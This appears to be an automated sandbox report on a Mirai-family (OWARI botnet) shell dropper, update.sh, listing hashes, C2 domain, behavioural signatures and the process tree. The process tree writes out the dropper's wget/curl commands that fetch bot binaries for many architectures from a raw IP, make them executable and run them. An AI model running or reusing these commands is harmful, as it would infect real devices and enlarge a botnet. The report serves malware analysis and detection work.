Analysis
- max time kernel: 96s
- max time network: 150s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240729-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 09-11-2024 13:37
Static task: static1
Behavioral task behavioral1: sample update.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample update.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample update.sh, resource debian9-mipsbe-20240418-en
Behavioral task behavioral4: sample update.sh, resource debian9-mipsel-20240729-en
General
- Target: update.sh
- Size: 2KB
- MD5: 2429f698cf97fe571bd6fdc423c2925c
- SHA1: 6a16632e6d5e903b94aac179a258f3ec5452881e
- SHA256: 2a51a31d68eb4fa02088756ceaff39ae3a7e78768fcc48cb9f81c67207be1d92
- SHA512: 9d351efd9ed6bfe34481ca2d23e9f482b68351900fe9c0a756b572a71c6af98c0c1633d198e45ec926ec2fa25aa3448f19f13cb2d7cf87e4203e07927f0fe5f3
Malware Config
Extracted
- Family: mirai
- Botnet: OWARI
- C2: cnc.carteldesinaloa.ru
Signatures
- Mirai family
- Contacts a large number (114131) of remote hosts (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- Creates a large number of network flows (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTPs, 11 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes:
  pid process
  764 chmod
  792 chmod
  817 chmod
  823 chmod
  847 chmod
  900 chmod
  742 chmod
  811 chmod
  875 chmod
  886 chmod
  748 chmod
- Modifies Watchdog functionality (1 TTPs, 10 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.
  Processes:
  description ioc process
  File opened for modification /dev/misc/watchdog nuklear.payload
  File opened for modification /dev/watchdog nuklear.payload
  File opened for modification /dev/misc/watchdog nuklear.payload
  File opened for modification /dev/watchdog nuklear.payload
  File opened for modification /dev/misc/watchdog nuklear.payload
  File opened for modification /dev/misc/watchdog nuklear.payload
  File opened for modification /dev/watchdog nuklear.payload
  File opened for modification /dev/watchdog nuklear.payload
  File opened for modification /dev/watchdog nuklear.payload
  File opened for modification /dev/misc/watchdog nuklear.payload
- Changes its process name (5 IoCs)
  Processes:
  description ioc pid process
  Changes the process name, possibly in an attempt to hide itself kOsEAfClWXITgCsgaFa 824 nuklear.payload
  Changes the process name, possibly in an attempt to hide itself oIMDlNcYsxtEGHKrJU 849 nuklear.payload
  Changes the process name, possibly in an attempt to hide itself eJMDZmLbvsrDCtrDAd 876 nuklear.payload
  Changes the process name, possibly in an attempt to hide itself fZMDwgfhOMFDlJnBIo 887 nuklear.payload
  Changes the process name, possibly in an attempt to hide itself DqMDCeMFHeiDMgeNJ 901 nuklear.payload
- Reads runtime system information
  Processes:
  description ioc process
  File opened for reading /proc/883/cmdline nuklear.payload
  File opened for reading /proc/904/cmdline nuklear.payload
  File opened for reading /proc/904/cmdline nuklear.payload
  File opened for reading /proc/829/cmdline nuklear.payload
  File opened for reading /proc/678/cmdline nuklear.payload
  File opened for reading /proc/904/cmdline nuklear.payload
  File opened for reading /proc/893/cmdline nuklear.payload
  File opened for reading /proc/428/cmdline nuklear.payload
  File opened for reading /proc/852/cmdline nuklear.payload
  File opened for reading /proc/879/cmdline nuklear.payload
  File opened for reading /proc/898/cmdline nuklear.payload
  File opened for reading /proc/893/cmdline nuklear.payload
  File opened for reading /proc/sys/crypto/fips_enabled curl
  File opened for reading /proc/717/cmdline nuklear.payload
  File opened for reading /proc/831/cmdline nuklear.payload
  File opened for reading /proc/sys/crypto/fips_enabled curl
  File opened for reading /proc/825/cmdline nuklear.payload
  File opened for reading /proc/684/cmdline nuklear.payload
  File opened for reading /proc/685/cmdline nuklear.payload
  File opened for reading /proc/708/cmdline nuklear.payload
  File opened for reading /proc/852/cmdline nuklear.payload
  File opened for reading /proc/879/cmdline nuklear.payload
  File opened for reading /proc/883/cmdline nuklear.payload
  File opened for reading /proc/888/cmdline nuklear.payload
  File opened for reading /proc/904/cmdline nuklear.payload
  File opened for reading /proc/852/cmdline nuklear.payload
  File opened for reading /proc/831/cmdline nuklear.payload
  File opened for reading /proc/883/cmdline nuklear.payload
  File opened for reading /proc/905/cmdline nuklear.payload
  File opened for reading /proc/684/cmdline nuklear.payload
  File opened for reading /proc/708/cmdline nuklear.payload
  File opened for reading /proc/830/cmdline nuklear.payload
  File opened for reading /proc/428/cmdline nuklear.payload
  File opened for reading /proc/855/cmdline nuklear.payload
  File opened for reading /proc/710/cmdline nuklear.payload
  File opened for reading /proc/907/cmdline nuklear.payload
  File opened for reading /proc/679/cmdline nuklear.payload
  File opened for reading /proc/850/cmdline nuklear.payload
  File opened for reading /proc/829/cmdline nuklear.payload
  File opened for reading /proc/685/cmdline nuklear.payload
  File opened for reading /proc/sys/crypto/fips_enabled curl
  File opened for reading /proc/675/cmdline nuklear.payload
  File opened for reading /proc/831/cmdline nuklear.payload
  File opened for reading /proc/829/cmdline nuklear.payload
  File opened for reading /proc/856/cmdline nuklear.payload
  File opened for reading /proc/684/cmdline nuklear.payload
  File opened for reading /proc/865/cmdline nuklear.payload
  File opened for reading /proc/850/cmdline nuklear.payload
  File opened for reading /proc/894/cmdline nuklear.payload
  File opened for reading /proc/898/cmdline nuklear.payload
  File opened for reading /proc/679/cmdline nuklear.payload
  File opened for reading /proc/825/cmdline nuklear.payload
  File opened for reading /proc/884/cmdline nuklear.payload
  File opened for reading /proc/902/cmdline nuklear.payload
  File opened for reading /proc/830/cmdline nuklear.payload
  File opened for reading /proc/892/cmdline nuklear.payload
  File opened for reading /proc/678/cmdline nuklear.payload
  File opened for reading /proc/684/cmdline nuklear.payload
  File opened for reading /proc/707/cmdline nuklear.payload
  File opened for reading /proc/888/cmdline nuklear.payload
  File opened for reading /proc/sys/crypto/fips_enabled curl
  File opened for reading /proc/877/cmdline nuklear.payload
  File opened for reading /proc/707/cmdline nuklear.payload
  File opened for reading /proc/877/cmdline nuklear.payload
- System Network Configuration Discovery (1 TTPs, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
- Writes file to tmp directory (24 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes:
  description ioc process
  File opened for modification /tmp/nuklear.x86_64 wget
  File opened for modification /tmp/nuklear.x86_64 curl
  File opened for modification /tmp/nuklear.arm5 wget
  File opened for modification /tmp/nuklear.arm6 wget
  File opened for modification /tmp/nuklear.m68k curl
  File opened for modification /tmp/nuklear.mips wget
  File opened for modification /tmp/nuklear.x86 curl
  File opened for modification /tmp/nuklear.arm6 curl
  File opened for modification /tmp/nuklear.arm7 curl
  File opened for modification /tmp/nuklear.m68k wget
  File opened for modification /tmp/nuklear.payload update.sh
  File opened for modification /tmp/nuklear.mpsl wget
  File opened for modification /tmp/nuklear.mpsl curl
  File opened for modification /tmp/nuklear.ppc curl
  File opened for modification /tmp/nuklear.sh4 wget
  File opened for modification /tmp/busybox cp
  File opened for modification /tmp/nuklear.arm wget
  File opened for modification /tmp/nuklear.arm curl
  File opened for modification /tmp/nuklear.ppc wget
  File opened for modification /tmp/nuklear.sh4 curl
  File opened for modification /tmp/nuklear.x86 wget
  File opened for modification /tmp/nuklear.arm5 curl
  File opened for modification /tmp/nuklear.arm7 wget
  File opened for modification /tmp/nuklear.mips curl
Processes
- /tmp/update.sh (PID 710)
  command: /tmp/update.sh
  signatures: Writes file to tmp directory
  - /bin/cp (PID 713)
    command: cp /bin/busybox /tmp/
    signatures: Writes file to tmp directory
  - /usr/bin/wget (PID 715)
    command: wget http://94.156.177.146/389242390482/nuklear.arm
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 734)
    command: curl -O http://94.156.177.146/389242390482/nuklear.arm
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat (PID 741)
    command: cat nuklear.arm
  - /bin/chmod (PID 742)
    command: chmod +x busybox nuklear.arm nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 743)
    command: ./nuklear.payload nuklear.payload
  - /usr/bin/wget (PID 745)
    command: wget http://94.156.177.146/389242390482/nuklear.arm5
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 746)
    command: curl -O http://94.156.177.146/389242390482/nuklear.arm5
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat (PID 747)
    command: cat nuklear.arm5
  - /bin/chmod (PID 748)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 749)
    command: ./nuklear.payload nuklear.payload
  - /usr/bin/wget (PID 751)
    command: wget http://94.156.177.146/389242390482/nuklear.arm6
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 752)
    command: curl -O http://94.156.177.146/389242390482/nuklear.arm6
    signatures: Writes file to tmp directory
  - /bin/cat (PID 763)
    command: cat nuklear.arm6
  - /bin/chmod (PID 764)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 765)
    command: ./nuklear.payload nuklear.payload
  - /usr/bin/wget (PID 768)
    command: wget http://94.156.177.146/389242390482/nuklear.arm7
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 778)
    command: curl -O http://94.156.177.146/389242390482/nuklear.arm7
    signatures: Writes file to tmp directory
  - /bin/cat (PID 791)
    command: cat nuklear.arm7
  - /bin/chmod (PID 792)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 794)
    command: ./nuklear.payload nuklear.payload
  - /usr/bin/wget (PID 798)
    command: wget http://94.156.177.146/389242390482/nuklear.m68k
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 807)
    command: curl -O http://94.156.177.146/389242390482/nuklear.m68k
    signatures: Writes file to tmp directory
  - /bin/cat (PID 809)
    command: cat nuklear.m68k
  - /bin/chmod (PID 811)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 812)
    command: ./nuklear.payload nuklear.payload
  - /usr/bin/wget (PID 814)
    command: wget http://94.156.177.146/389242390482/nuklear.mips
    signatures: System Network Configuration Discovery; Writes file to tmp directory
  - /usr/bin/curl (PID 815)
    command: curl -O http://94.156.177.146/389242390482/nuklear.mips
    signatures: Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - /bin/cat (PID 816)
    command: cat nuklear.mips
    signatures: System Network Configuration Discovery
  - /bin/chmod (PID 817)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 818)
    command: ./nuklear.payload nuklear.payload
  - /usr/bin/wget (PID 820)
    command: wget http://94.156.177.146/389242390482/nuklear.mpsl
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 821)
    command: curl -O http://94.156.177.146/389242390482/nuklear.mpsl
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat (PID 822)
    command: cat nuklear.mpsl
  - /bin/chmod (PID 823)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 824)
    command: ./nuklear.payload nuklear.payload
    signatures: Modifies Watchdog functionality; Changes its process name; Reads runtime system information
  - /usr/bin/wget (PID 828)
    command: wget http://94.156.177.146/389242390482/nuklear.ppc
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 836)
    command: curl -O http://94.156.177.146/389242390482/nuklear.ppc
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 847)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload nuklear.ppc systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 849)
    command: ./nuklear.payload nuklear.payload
    signatures: Modifies Watchdog functionality; Changes its process name; Reads runtime system information
  - /usr/bin/wget (PID 853)
    command: wget http://94.156.177.146/389242390482/nuklear.sh4
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 865)
    command: curl -O http://94.156.177.146/389242390482/nuklear.sh4
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 875)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload nuklear.ppc nuklear.sh4 systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 876)
    command: ./nuklear.payload nuklear.payload
    signatures: Modifies Watchdog functionality; Changes its process name; Reads runtime system information
  - /usr/bin/wget (PID 880)
    command: wget http://94.156.177.146/389242390482/nuklear.x86
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 884)
    command: curl -O http://94.156.177.146/389242390482/nuklear.x86
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 886)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload nuklear.ppc nuklear.sh4 nuklear.x86 systemd-private-25cfef09d60348ebb2dd32362bf180f7-systemd-timedated.service-Gu7QQ6 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 887)
    command: ./nuklear.payload nuklear.payload
    signatures: Modifies Watchdog functionality; Changes its process name; Reads runtime system information
  - /usr/bin/wget (PID 891)
    command: wget http://94.156.177.146/389242390482/nuklear.x86_64
    signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 898)
    command: curl -O http://94.156.177.146/389242390482/nuklear.x86_64
    signatures: Writes file to tmp directory
  - /bin/chmod (PID 900)
    command: chmod +x busybox nuklear.arm nuklear.arm5 nuklear.arm6 nuklear.arm7 nuklear.m68k nuklear.mips nuklear.mpsl nuklear.payload nuklear.ppc nuklear.sh4 nuklear.x86 nuklear.x86_64 update.sh
    signatures: File and Directory Permissions Modification
  - /tmp/nuklear.payload (PID 901)
    command: ./nuklear.payload nuklear.payload
    signatures: Modifies Watchdog functionality; Changes its process name; Reads runtime system information
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 857KB
  MD5: 6ffc46165b5d9726a6607f3ea5305589
  SHA1: ab127220f42e816b413dde0d17031e251a7bc98f
  SHA256: 80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c
  SHA512: 456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8
- Filesize: 75KB
  MD5: 580cbce6bacb7497bdcec26c1ba42376
  SHA1: a3003ef3e494492551b911e453085cb058d73aab
  SHA256: 56f7b319fcba3b0dadc568dbb20a0c477b55f57e746e41fb6fc254a959a16ca8
  SHA512: 7138e4086e45c3f2ecf5a881e6c50478ecf53bf1ffbf913f07328acf925fcb813611ebf6a7182c0730472c3d902838389ca72ef741e3b4b4cf483e3cb448c15a